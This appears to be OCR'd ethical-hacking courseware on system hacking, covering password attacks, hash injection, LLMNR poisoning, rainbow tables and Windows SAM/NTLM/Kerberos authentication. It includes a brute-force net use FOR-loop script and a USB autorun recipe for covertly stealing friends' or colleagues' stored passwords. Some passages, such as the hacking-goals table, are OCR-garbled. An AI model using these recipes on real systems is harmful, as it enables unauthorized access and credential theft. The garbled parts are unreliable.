Module Objectives
System
hacking is one of the most important and, sometimes, the ultimate goal of an
attacker. The attacker acquires information through techniques such as
footprinting, scanning, and enumeration, and uses it to hack the target system.
This module will focus your awareness on the tools and techniques used by the
attacker to achieve his/her goal of hacking the target system.
This module
starts with an overview of hacking methodology. Later, it discusses in detail
various hacking stages, such as gaining and maintaining access, and clearing
logs. The module ends with a discussion on system hacking penetration testing.
At the end
of this module, you will be able to:
= Describe
the CEH Hacking Methodology
= Explain
different techniques to gain access to the system
= Apply
privilege escalation techniques
= Explain
different techniques to create and maintain remote access to the system
= Describe
different types of rootkits
= Explain
steganography and steganalysis techniques
= Apply different techniques to hide the evidence of compromise
= Perform
system hacking penetration testing
System Hacking Concepts
An attacker
engages in system hacking attempts using information collected in earlier footprinting,
scanning, enumeration, and vulnerability analysis phases. Let us go over these phases
and the information collected thus far.Prior to this module, we discussed:
=
Footprinting Module: Footprinting is the process of accumulating data regarding
a specific network environment. In the footprinting phase, the attacker creates
a profile of the target organization, obtaining information such as its IP
address range, namespace, and employees.
Footprinting
eases the process of system hacking by revealing its vulnerabilities. For example,
the organization’s website may provide employee bios or a personnel directory,
which the hacker can use it for social engineering purposes. Conducting a
Whois query
on the web can provide information about the associated networks and domain
names related to a specific organization.
= Scanning
Module: Scanning is a procedure for identifying active hosts, open ports, and unnecessary
services enabled on particular hosts. Attackers use different types of scanning,
such as port scanning, network scanning, and vulnerability scanning of target networks
or systems, which help in identifying possible vulnerabilities. Scanning procedures
such as port scanning and ping sweep return information about the services offered
by the live hosts that are active on the Internet, and their IP addresses.
=
Enumeration Module: Enumeration is a method of intrusive probing, through which
attackers gather information such as network user lists, routing tables,
security flaws, and Simple Network Management Protocol (SNMP) data. This is
significant, because the attacker ranges over the target territory to glean information
about the network, and shared users, groups, applications, and banners.
Enumeration
involves making active connections to the target system or subjecting it to direct
queries. Normally, an alert and secure system will log such attempts. Often,
the information gathered is publicly available anyway, such as a DNS address;
however, it is possible that the attacker might stumble upon a remote IPC
share, such as IPCS in Windows, that can be probed with a null session, thus allowing
shares and accounts to be enumerated.
Vulnerability
Analysis Module: Vulnerability assessment is an examination of the ability of a
system or application, including current security procedures and controls, to withstand
assault. It recognizes, measures, and classifies security vulnerabilities in a
computer
system, network, and communication channels Attackers perform vulnerability
analysis to identify security loopholes in the target organization’s network,
communication infrastructure, and end systems. The identified vulnerabilities
are used by the attackers to perform further exploitation on that target
network.
CEH Hacking Methodology (CHM)
In
preparation for hacking a system, attackers follow a certain methodology. They
first obtain information during the footprinting, scanning, and enumeration
phases, which they then use to exploit the target system. There are three steps
in the CEH Hacking Methodology (CHM):
Gaining
Access
Involves
gaining access to low-privileged user accounts by cracking passwords through techniques
such as brute-forcing, password guessing, and social engineering, and then escalating
their privileges to administrative levels, to perform a protected operation.
Maintaining
Access
After
successfully gaining access to the target system, attackers work to maintain
high levels of access to perform malicious activities such as executing
malicious applications and stealing, hiding, or tampering with sensitive system
files.
Clearing
Logs
To maintain
future system access, attackers attempt to avoid recognition by legitimate system
users. To remain undetected, attackers wipe out the entries corresponding to their
activities in the system log, thus avoiding detection by users.
Hacking Goals
Hacking-Stage
Goal Technique/Exploit Used
Gaining
Access > | eee > Password cracking, social engineering
Escalating
Privileges > | jpppmetzie the eles otenesbecimetia | > | caioling known
system
Executing
Applications > ed malstain secnots pecats > oe eee backiioots,
Hiding Files
» Tonle atactersmaliciousactwities Rootkits, steganography
Covering
Tracks > Tohide the evidence of compromise > _—Clearing logs
System Hacking Goals
The intent
of every criminal is to achieve a certain goal. Likewise, attackers can have
certain goals behind their system attacks. The following are some goals of
system attackers. The diagram in the slide shows these goals at different
hacking stages and the techniques used to achieve them.
Gaining Access
In system
hacking, the attacker first tries to gain access to a target system using information
obtained and loopholes found in the system’s access control mechanism. Once
attackers succeed in gaining access to the system, they are free to perform malicious
activities such as stealing sensitive data, implementing a sniffer to capture network
traffic, and infecting the system with malware. At this stage, attackers use techniques
such as password cracking and social engineering tactics to gain access to the
target system.
Escalating Privileges
After
gaining access to a system using a low-privileged normal user account,
attackers may then try to increase their administrator privileges to perform
protected system operations, so that they can proceed to the next level of the
system hacking phase: to execute applications. Attackers exploit known system vulnerabilities
to escalate user privileges.
Executing Applications
Once attackers
have administrator privileges, they attempt to install malicious programs such
as Trojans, Backdoors, Rootkits, and Keyloggers, which grant them remote system
access, thereby enabling them to execute malicious codes remotely. Installing
Rootkits allows them to gain access at the operating system level to perform
malicious activities.
To maintain
access for use at a later date, they may install Backdoors.
= Hiding
Files
Attackers
use Rootkits and steganography techniques to attempt to hide the malicious files
they install on the system, and thus their activities.
= Covering Tracks
To remain
undetected, it is important for attackers to erase all evidence of security compromise
from the system. To achieve this, they might modify or delete logs in the system
using certain log-wiping utilities, thus removing all evidence of their
presence.
Cracking Passwords
As discussed
earlier, CHM involves various steps attackers follow to hack systems. The
following section discusses these steps in greater detail. The first step,
password cracking, discusses different tools and techniques attackers use to
crack password on the target system. coximrawons | Password Cracking Password cracking
techniques are used to recover passwords from computer | systems Attackers use
password cracking techniques to gain unauthorized access to vulnerable system
wan Most of the password cracking techniques are successful due to weak or
easily guessable passwords ete sacl:
Password Cracking
Password
cracking is the process of recovering passwords from the data transmitted by a computer
system or stored in it. The purpose of password cracking might be to help a
user recover a forgotten or lost password, as a preventive measure by system
administrators to check for easily breakable passwords, or an attacker can use
this process to gain unauthorized system access.
Hacking
often begins with password cracking attempts. A password is a key piece of information
necessary to access a system. Consequently, most attackers use password
cracking techniques to gain unauthorized access. An attacker may either crack a
password manually by guessing it, or use automated tools and techniques such as
a dictionary or a brute-force method. Most password cracking techniques are
successful because of weak or easily guessable passwords.
Types of Password Attacks
Password cracking is one of the crucial stages of system hacking. Password cracking mechanisms often exploit otherwise legal means to gain unauthorized system access, such as recovering a user's forgotten password. Classification of password attacks depends on attackers' actions, which are typically one of four types:
■ Non-Electronic Attacks: This is probably the attacker's first attempt at gaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation. Therefore, this is a non-electronic attack. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc.
■ Active Online Attacks: This is one of the easiest ways to gain unauthorized administrator-level system access. An attacker needs to communicate with target machines to gain password access. Techniques used by the attacker to perform active online attacks include password guessing, dictionary and brute forcing attack, hash injection, phishing, LLMNR/NBT-NS Poisoning, using Trojan/spyware/keyloggers, etc.
■ Passive Online Attacks: A passive attack is a system attack that does not result in a change to the system in any way. In this attack, the attacker does not need to communicate with the system. Instead, he/she passively monitors or records the data passing over the communication channel to and from the system. The attacker then uses the observed data to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attack, replay attack, etc.
■ Offline Attacks: Offline attack refers to password attacks where an attacker tries to recover clear text passwords from a password hash dump. Offline attacks are often time consuming, but can be successful, as password hashes can be reversed due to their smaller keyspace and shorter length. Attackers use pre-computed hashes from rainbow tables to perform offline and distributed network attack.
Non-Electronic Attacks
Non-electronic, or non-technical, attacks do not require technical knowledge of methods of system intrusion. There are four types of non-electronic attacks: social engineering, shoulder surfing, keyboard sniffing, and dumpster diving.
■ Dumpster Diving
"Dumpster diving" is a key attack method that targets a substantial failure in computer security. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to scrutinize garbage. Looking through the trash is a type of low-tech attack with many implications.
Dumpster diving was actually quite popular in the 1980s. The term itself refers to the collection of any useful, general information from waste dumps such as trashcans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, receipts, credit card numbers, or other sensitive documents.
Examination of waste products from waste dumps can help attackers, and there is ample evidence to support this concept. Support staff often dumps sensitive information without a thought regarding as to whose hands it may end up in. Attackers thus gain unauthorized system access using these methods. Likewise, the objects found can lead to other types of attacks, such as social engineering.
■ Shoulder Surfing
Shoulder surfing is a technique through which attackers steal passwords by hovering near legitimate users and watching them enter their passwords. Attackers simply watch users' keyboards or screens as they log in, and to see if users refer to, for example, an object on their desks for written passwords or mnemonics. Obviously, shoulder surfing is possible only in some proximity to the target.
This type of attack can also occur in a grocery store checkout line, when a potential victim is swiping a debit card and entering the required PIN (Personal Identification Number), which is typically only four digits, making it easier to observe.
■ Social Engineering
In computer security, social engineering is the term applied to a non-technical type of intrusion that exploits human behavior. Typically, it relies heavily on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a "con game" to break security procedures. For example, an attacker using social engineering to break into a computer network would try to gain the trust of someone authorized to access the network, and then try to extract the information that compromises network security. Social engineering is, in effect, a run- through used to procure confidential information by deceiving or swaying people. An attacker can misrepresent himself/herself as a user or system administrator to obtain a user's password. It is natural for people to be helpful and trusting. People generally make an effort to build amicable relationships with friends and colleagues. Social engineers take advantage of this tendency.
Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are not aware of the value of the information they possess and few are careful about protecting it. Attackers take advantage of this fact. Social engineers will typically search dumpsters for valuable information. A social engineer would have a tougher time getting the combination to a safe, or to a health-club locker, than a password. The best defense is to educate, train, and create awareness.
Active Online Attack: Dictionary, Brute Forcing, and Rule-based Attack
■ Dictionary Attack
In a dictionary attack, a dictionary file is loaded into the cracking application that runs against user accounts. This dictionary is the text file that contains a number of dictionary words that are commonly used as passwords. The program uses every word present in the dictionary to find the password. Apart from a standard dictionary, attackers' dictionaries have added entries with numbers and symbols added to words (e.g., "3December!962"). Simple keyboard finger rolls ("qwer0987"), which many believe to produce random and secure passwords, are thus included in an attacker's dictionary. Dictionary attacks are more useful than brute force attacks. However, dictionary attacks do not work in systems using passphrases.
This attack is applicable under two situations:
o In cryptanalysis, to discover the decryption key for obtaining the plaintext from ciphertext
o In computer security, to bypass authentication and access control mechanism of the computer by guessing passwords
Methods to improve the success of a dictionary attack:
o Use of a number of different dictionaries, such as Technical and foreign dictionaries, which increases the number of possibilities
o Use of string manipulation with the dictionary (e.g., if the dictionary contains the word "system," string manipulation creates anagrams like "metsys," among others)
■ Brute-Force Attack
In a brute force attack, attackers try every combination of characters until the password is broken. Cryptographic algorithms must be sufficiently hardened to prevent a brute-force attack, which is defined by the RSA: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified."
Brute-force attack is when someone tries to produce each single encryption key for data to detect the needed information. Even today, only those with sufficient processing power could successfully perform this type of attack.
Cryptanalysis is a brute-force attack on an encryption employing a search of the keyspace. In other words, testing all possible keys is one of the attempts to recover the plaintext used to produce a particular ciphertext. The detection of a key or plaintext that is faster than a brute force attack is one way of breaking the cipher. A cipher is secure if no method exists to break it other than a brute-force attack. Mostly, all ciphers are deficient in mathematical proof of security. If the user chooses keys randomly or searches randomly, the plaintext will become available after the system tries half of all the possible keys.
Some of the considerations for brute-force attacks are: o It is a time-consuming process.
o All passwords will eventually be found. ■ Rule-based Attack
Attackers use this type of attack when they obtain some information about the password. This is a more powerful attack than the dictionary and brute-force attacks, because the cracker knows the password type. For example, if the attacker knows that the password contains a two- or three-digit number, he or she will use some specific techniques to extract the password quickly.
By obtaining useful information such as the method in which numbers and/or special characters have been used, and password length, attackers can minimize the time required to crack the password and thereby enhance the cracking tool. This technique involves brute force, a dictionary, and syllable attacks.
For online password cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the category of Hybrid and Syllable password cracking attacks.
o Hybrid Attack
This type of attack depends on the dictionary attack. Often, people change their passwords merely by adding some numbers to their old passwords. In this case, the program would add some numbers and symbols to the words from the dictionary to try and crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "systeml" or "system2."
o Syllable Attack
Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of them.
Active Online Attack: Password Guessing
Password guessing is one of the password cracking techniques that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other way and tries them manually on the victim's machine to crack the passwords.
The following are the steps involved in password guessing:
■ Find a valid user
■ Create a list of possible passwords
■ Rank passwords from high probability to low
■ Key in each password, until correct password is discovered
Hackers can crack the passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop. A hacker can also create a script file that tries each password in a list. Still, these techniques are considered manual cracking. The failure rate of this type of attack is high.
Manual Password-Cracking Algorithm
In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with user names and passwords and iterates them using the FOR loop.
The main FOR loop can extract the user names and passwords from the text file, which serves as a dictionary as it iterates through every line:
[file: credentials.txt]
administrator ""
administrator password
administrator administrator
[Etc.]
Type the following commands to access the text file from a directory: c:\>F0R /F "tokens=l,2*" %i in (credentials. txt) A
More? do net use \\victim.com\IPC$ %j /u:victim.com\%iA
More? 2»nulA
More? && echo %time% %date% » outfile.txtA
More? && echo \\victim.com acct: %i pass: %j » outfile.txt c:\>type outfile.txt
The outfile.txt contains the correct user name and password, if the user name and password in credentials.txt are correct. An attacker can establish open session with the victim server using his/her system.
Default Passwords
Default passwords are those supplied by manufacturers with new equipment (e.g. switches, hubs, routers). Usually, default passwords provided by the manufacturers of password- protected devices allow the user to access the device during initial setup, and then change the password. But often, an administrator will either forget to set the new password or ignore the password-change recommendation and continue using the original password. Attackers can exploit this lapse and find the default password for the target device from manufacturer websites or using online tools which shows default passwords to successfully access the target device. Attackers use default passwords in the list of words or dictionary that they use to perform password guessing attack.
The following are some of the online tools to search default passwords:
■ https://www.fortypoundhead.com
■ http://www.defaultpassword.us
■ http://www.routerpasswords.com
■ http://www.defaultpassword.com
■ https://default-password.info
Active Online Attack: Trojan/Spyware/Keylogger
A Trojan is a program that masks itself as a benign application. The software initially appears to perform a desirable or benign function but instead steals information or harms the system. With a Trojan, attackers can gain remote access and perform various operations limited by user privileges on the target computer.
Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect.
A keylogger is a program that records all user keystrokes without the user's knowledge. Keyloggers ship the log of user keystrokes to an attacker machine or hide it in the victim's machine for later retrieval. The attacker then scrutinizes them carefully for finding passwords or other useful information that could compromise the system.
An attacker installs Trojan/Spyware/Keylogger on a victim's machine to collect the victim's user names and passwords. These programs run in the background and send back all user credentials to the attacker.
For example, a key logger on a victim's computer is capable of revealing the contents of all user emails. The picture given in the slide depicts a scenario describing how an attacker gains password access using a Trojan/Spyware/Keylogger.
Example of Active Online Attack Using USB Drive
Obtaining passwords using a USB drive is a physical approach for password hacking. Attackers can steal passwords using a USB drive and different applications. People who have multiple online accounts usually store their user names and passwords as a backup in case they forget them. You can recover or steal such credentials using a USB drive.
The physical approach matters a lot for hacking passwords. One can steal passwords using a USB drive and applications. This method is applicable for hacking stored passwords on any computer. Most of the people signing up for a large number of websites usually store their passwords on the computer to remember them. Recovering passwords automatically using a USB drive requires plugging the USB drive in any port of the target computer. This trick is applicable for Windows XP, Windows 2000, Windows Vista, and Windows 7.
All the applications included are portable and light enough to download to the USB drive in seconds. You can also hack stored Messenger passwords. Using tools and a USB pen drive, you can create a rootkit to hack passwords from the target computer.
Following are the steps to steal passwords using a USB device:
1. You need to download PassView, a password hacking tool.
2. Copy the downloaded .exe PassView file to the USB drive.
3. Create a Notepad document, and put the following content or code in the notepad: [autorun]
en=launch.bat
After writing this content into Notepad, save the document as autorun.inf and copy this file to the USB drive.
4. Open Notepad, and write the following content: start pspv.exe/stext pspv.txt
After that, save file as launch.bat and copy this file to the USB drive.
5. Insert the USB drive and the autorun window pop-up appears (if enabled).
6. PassView (or other password-hacking tool) runs in the background and stores the passwords in the .txt files on the USB drive.
In this way, you can create your own USB password recovery toolkit and use it to steal the stored passwords of your friends or colleagues without their knowledge. It only takes a few seconds to retrieve passwords.
Active Online Attack: Hash Injection Attack
This type of attack is possible when the target system uses a hash function as part of the authentication process to authenticate its users. Generally, the system stores hash values of the credentials in the SAM database/file on a Windows computer. In such cases, the server computes the hash value of the user-submitted credentials or allows user to input the hash value directly. The server then checks it against the stored hash value for authentication.
Attackers take advantage of such authentication mechanisms and first exploit the target server to retrieve the hashes from the SAM databases. They then input the hashes acquired directly into the authentication mechanism to authenticate with stolen user's pre-computed hashes. Thus, in a hash injection attack, the attackers inject a compromised hash into a local session and then use the hash to authenticate to the network resources.
The hacker carries out this attack by implementing the following four steps:
■ The hacker compromises one workstation/server using a local/remote exploit.
■ The hacker extracts stored hashes and finds a domain admin account hash.
■ The hacker uses the hash to log on to any system (domain controller) with the same credentials.
■ The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.
Active Online Attack: LLMNR/NBT-NS Poisoning
LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows operating systems used in order to perform name resolution for hosts present on the same link. These services are enabled by default in Windows operating systems.
When the DNS server fails in an attempt to resolve name queries, the host performs an unauthenticated UDP broadcast asking all the hosts if anyone has a name that it is looking for. Due to the fact that the host trying to connect is following an unauthenticated and broadcast process, it becomes easy for an attacker to passively listen to a network for LLMNR (UDP port 5355) and NBT-NS (UDP port 137) broadcasts, and respond to the request pretending to be a target host. After accepting a connection with a host, the attacker can make use of tools such as Responder.py or Metasploit to forward the request to a rogue server (For instance TCP: 137) to perform an authentication process.
During the authentication process the attacker sends an NTLMv2 hash to the rogue server which was obtained from the host trying to authenticate itself. This hash is stored in a disk and can be cracked using offline hash cracking tools such as hashcat or John the ripper. Once cracked, those credentials can be used to log in to get an access to the legitimate host system.
Steps involved in LLMNR/NBT-NS poisoning:
1. User sends a request to connect to the data sharing system, \\DataServer which she mistakenly typed as \\DtaServr.
2. The \\DataServer responds to the user saying that it does not know the host named \\DtaServr.
3. The user then performs LLMNR/NBT-NS broadcast to find out if anyone in the network knows the host name\\DtaServr.
4. The attacker replies to the user saying that it is \\DataServer and accepts user NTLMv2 hash and responds to the user with an error.
LLMNR/NBT-NS Poisoning Tools
■ Responder
Source: https://github.com
Responder an LLMNR, NBT-NS and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only responds to a File Server Service request, which is for SMB.
Features:
o Built-in SMB Auth server, MSSQL Auth server, HTTP and HTTPs Auth server, HTTPS Auth server, LDAP Auth server
o Built-in FTP, POP3, IMAP, SMTP Auth servers o ICMP Redirect
o Rogue DHCP
Some of the LLMNR/NBT-NS spoofing tools are listed below:
■ Metasploit (https://www.metasploit.com)
■ NB NS p oof (https://github.com)
■ Inveigh (https://github.com)
Passive Online Attack: Wire Sniffing
Packet sniffing is a form of wire sniffing or wiretapping in which hackers sniff credentials during transit by capturing Internet packets. Attackers rarely use sniffers to carry out this type of attack. With packet sniffing, an attacker can gain passwords such as Email, websites, SMB, FTP, rlogin sessions or SQL. As sniffers run in the background, the victim will not be aware of the sniffing.
As sniffers gather packets at the Data Link Layer, they can grab all the packets on the LAN of the machine running the sniffer program. This method is relatively hard to perpetrate and is computationally complicated. This is because a network with a hub implements a broadcast medium that all systems share on the LAN. The LAN sends the data to all machines connected to it. If an attacker runs a sniffer on one system on the LAN, he or she can gather data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff data in a hub environment. These tools are passive sniffers, as they passively wait for data transfer before capturing the information. They are efficient at imperceptibly gathering data from the LAN. The captured data may include passwords sent to remote systems during FTP, rlogin sessions, and electronic mail. The attacker uses these sniffed credentials to gain unauthorized access to the target system. There are a variety of tools available on the Internet for passive wire sniffing.
Passive Online Attacks: Man-in-the-Middle and Replay Attack
When two parties are communicating, a man-in-middle attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. Meanwhile, the third party eavesdrops on the traffic, and then passes it along. To do so, the "man in the middle" has to sniff from both sides of the connection simultaneously. In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks because of the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.
In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access. The attacker uses this type of attack to replay bank transactions or other similar types of data transfer, in the hope of replicating and/or altering activities, such as banking deposits or transfers.
Offline Attack: Rainbow Table Attack
Offline attacks occur when the intruder checks the validity of passwords. She/he observes how the password is stored. If the user names and passwords are stored in a file that is readable, it becomes easy for the attacker to gain access to the system. Hence, it is important to protect the passwords list and keep it in an unreadable form, preferably encrypted.
Offline attacks are time consuming. However, they can be successful due to their smaller keyspace and shorter length. Different password cracking techniques are available on the Internet.
Two examples of offline attacks are:
1. Rainbow Table Attack
2. Distributed Network Attack
Rainbow Table Attack
A rainbow table attack uses the cryptanalytic time-memory trade-off technique, which requires less time than some other techniques. It uses already-calculated information stored in memory to crack the cryptography. In the rainbow table attack, the attacker creates a table of all the possible passwords and their respective hash values, known as a rainbow table, in advance.
Rainbow Table: A rainbow table is a precomputed table which contains word lists like dictionary files and brute force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a cipher text. The attacker uses this table to look for the password and tries to recover it from password hashes.
Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password.
Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables.
Tools to Create Rainbow Tables: rtgen and Winrtgen
Attackers can create rainbow tables by using the following tools.
■ rtgen
Source:/? ttp ://project-rainbo wcrack. com
RainbowCrack is a general propose implementation that takes advantage of the time memory trade-off technique to crack hashes. This project allows you to crack a hashed password. The rtgen tool of this project helps to generate the rainbow tables. The rtgen program needs several parameters to generate a rainbow table.
The syntax of the command line is:
Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index
■ Winrtgen
Source: http://www.oxid.it
Winrtgen is a graphical rainbow tables generator that helps attackers to create rainbow tables from which they can crack the hashed password. Winrtgen supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHAl, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.
Generate rainbow tables using Winrtgen:
1. Download and install Winrtgen. Click the Add Table button.
2. In the Rainbow Table properties window, set up all of the properties, and click OK. In the main program, click OK.
Offline Attack: Distributed Network Attack
A Distributed Network Attack (DNA) is a technique used for recovering password-protected files that utilizes the unused processing power of machines across the network to decrypt passwords. In this attack, an attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack, assigning small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password.
Features of the DNA:
■ Reads statistics and graphs easily
■ Adds user dictionaries to crack the password
■ Optimizes password attacks for specific languages ■ Modifies the user dictionaries
■ Comprises the stealth client installation functionality
■ Automatically updates client while updating the DNA server On classification, the DNA splits into two modules:
■ DNA Server Interface
The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all jobs that the DNA server is executing. This interface contains:
o Current jobs: The current job queue consists of all jobs added to the list by the controller. The current job list has many columns, such as the identification number assigned by the DNA to the job, the name of the encrypted file, the user's password, the password that matches a key, which can unlock the data, the status of the job, and various other columns.
o Finished jobs: The finished job list provides information about the decryption jobs including the password. The finished job list also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, and so on.
■ DNA Client Interface
Users can use the DNA client interface from many workstations. The DNA client interface helps the client statistics to coordinate easily, and is available on machines with the pre-installed DNA client application. There are many components such as the name of the DNA client, the name of the group to which the DNA client belongs, the statistics about the current job, and many other components.
Network Management
The Network Traffic dialog box aids in the discovery of the network speed the DNA uses and each work-unit length of the DNA client. Using the work-unit length, a DNA client can work without contacting the DNA server. The DNA client application has the ability to contact the DNA server at the beginning and ending of the work-unit length.
The user can monitor the job status queue and the DNA. After collecting the data from Network Traffic dialog box, the user can modify the client work. When the size of the work-unit length increases, the speed of the network traffic decreases. Decrease in the speed of the traffic leads the client working on the jobs to spend longer amounts of time. Therefore, the user can make fewer requests to the server because of the reduction in bandwidth of network traffic.
Password Recovery Tools
Password Recovery tools allow attackers to break complex passwords, recover strong encryption keys, and unlock several documents.
■ Elcomsoft Distributed Password Recovery Source: https://www.elcomsoft.com
The application allows attackers to break complex passwords, recover strong encryption keys, and unlock documents in a production environment. It allows for the execution of mathematically intensive password recovery code on the parallel computational elements found in modern graphic accelerators by employing an innovative technology to accelerate password recovery, when a compatible ATI or NVIDIA graphics card is present in addition to the CPU-only mode. When compared to password recovery methods that use only the computer's main CPU, the GPU acceleration used by this technology makes password recovery faster. This in turn supports password recovery using a variety of applications and file formats.
Some of the password recovery tools are listed below:
■ Passware Kit Forensic (https://www.passware.com)
■ WINDOWS PASSWORD RECOVERY TOOL ULTIMATE (https://www.tenorshare.com)
■ Stellar Phoenix Password Recovery (https://www.stellarinfo.com)
■ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
■ PCUnlocker (https://www.top-password.com)
■ iSumsoft Windows Password Refixer (http://www.isumsoft.com)
■ hashcat (https://hashcat.net)
Microsoft Authentication
When users log in to a Windows computer, a series of steps is performed for user authentication. The Windows operating system authenticates its users with the help of three mechansims (protocols) provided by Microsoft.
■ Security Accounts Manager (SAM) Database
Windows uses the Security Accounts Manager (SAM) database or Active Directory Database to manage user accounts and passwords in the hashed format (one-way hash). The system does not store the passwords in plaintext format, but in hashed format, to protect them from attacks. The system implements SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive file system lock on the SAM file. As this file consists of a file system lock, this provides some measure of security for the storage of passwords.
It is not possible to copy the SAM file to another location in the case of online attacks. Because the system locks the SAM file with an exclusive file system lock, a user cannot copy or move it while Windows is running. The lock will not release until the system throws a blue screen exception or the operating system has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the on-disk contents of the SAM file using various techniques. The SAM file uses a SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.
Even if hackers use subterfuge techniques to discover the contents, the encrypted keys with a one-way hash make it difficult to hack. In addition, some versions have a secondary key, making the encryption specific to that copy of the OS.
■ NTLM Authentication
NTLM (NT LAN Manager) is a default authentication scheme that performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works correctly in every situation. It has been on some Windows installations, where it worked successfully. NTLM authentication consists of two protocols: NTLM authentication protocol and LM authentication protocol. These protocols use different hash methodology to store users' passwords in the SAM database.
■ Kerberos Authentication
Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using secret-key cryptography. This provides mutual authentication, in that both the server and the user verify each other's identity. Messages sent through Kerberos protocol are protected against replay attacks and eavesdropping.
Kerberos makes use of the Key Distribution Center (KDC), a trusted third party. This consists of two logically distinct parts: an Authentication server (AS) and a Ticket Granting Server (TGS). Kerberos uses "tickets" to prove a user's identity.
Microsoft has upgraded its default authentication protocol to Kerberos which provides a stronger authentication for client/server applications than NTLM.
How Hash Passwords Are Stored in Windows SAM?
Windows operating systems use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%/system32/config/SAM in Windows systems, and Windows mounts it in the registry, under the HKLM/SAM registry hive. It stores LAN Manager (LM) or NT LAN Manager (NTLM) hashed passwords.
NTLM supersedes the LM hash, which is susceptible to cracking. New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hash by default. The LM hash is blank in newer Windows versions. Selecting the option to remove LM hashes enables an additional check during password change operations but does not clear LM hash values from the SAM immediately: The SAM file stores a "dummy" value in its database, which bears no relationship to the user's actual password and is the same for all user accounts. It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to a "dummy" value when a user or administrator sets a password of more than 14 characters.
NTLM Authentication Process
NTLM includes three methods of challenge-response authentication: LM, NTLMvl, and
NTLMv2, all of which use the same technique for the authentication process. The only difference among them is the level of encryption. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft negotiated Security Support Provider (SSP).
The following steps demonstrate the process and the flow of the client authentication to a domain controller using any NTLM protocol:
■ The client types the user name and password into the logon window.
■ Windows runs the password through a hash algorithm and generates a hash for the password that has been entered in the logon window.
■ The client computer sends a login request along with domain name to the domain controller.
■ The domain controller generates a 16-byte random character string called a "nonce" and sends it to the client computer.
■ The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller.
■ The domain controller retrieves the hash of the user password from the SAM and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client and the logon is successful.
Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.
Kerberos Authentication
Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using secret-key cryptography, which provides a mutual authentication. Both the server and the user verify each other's identity. Messages sent through the Kerberos protocol are protected against replay attacks and eavesdropping.
Kerberos makes use of the Key Distribution Center (KDC), a trusted third party, and consists of two logically distinct parts: an Authentication server (AS) and a Ticket Granting Server (TGS). The authorization mechanism of Kerberos provides the user with a Ticket Granting Ticket (TGT) that serves post-authentication for later access to specific services. Single Sign-On by which the user need not re-enter the password again for accessing any authorized services. It is important to note that there is no direct communication between the application servers and Key Distribution Center (KDC); the service tickets, even if packed by TGS, reach the service only through the client willing to access them.
Password Salting
Password salting is a technique where random strings of characters are added to the password before calculating their hashes. This makes it more difficult to reverse the hashes and defeats pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters.
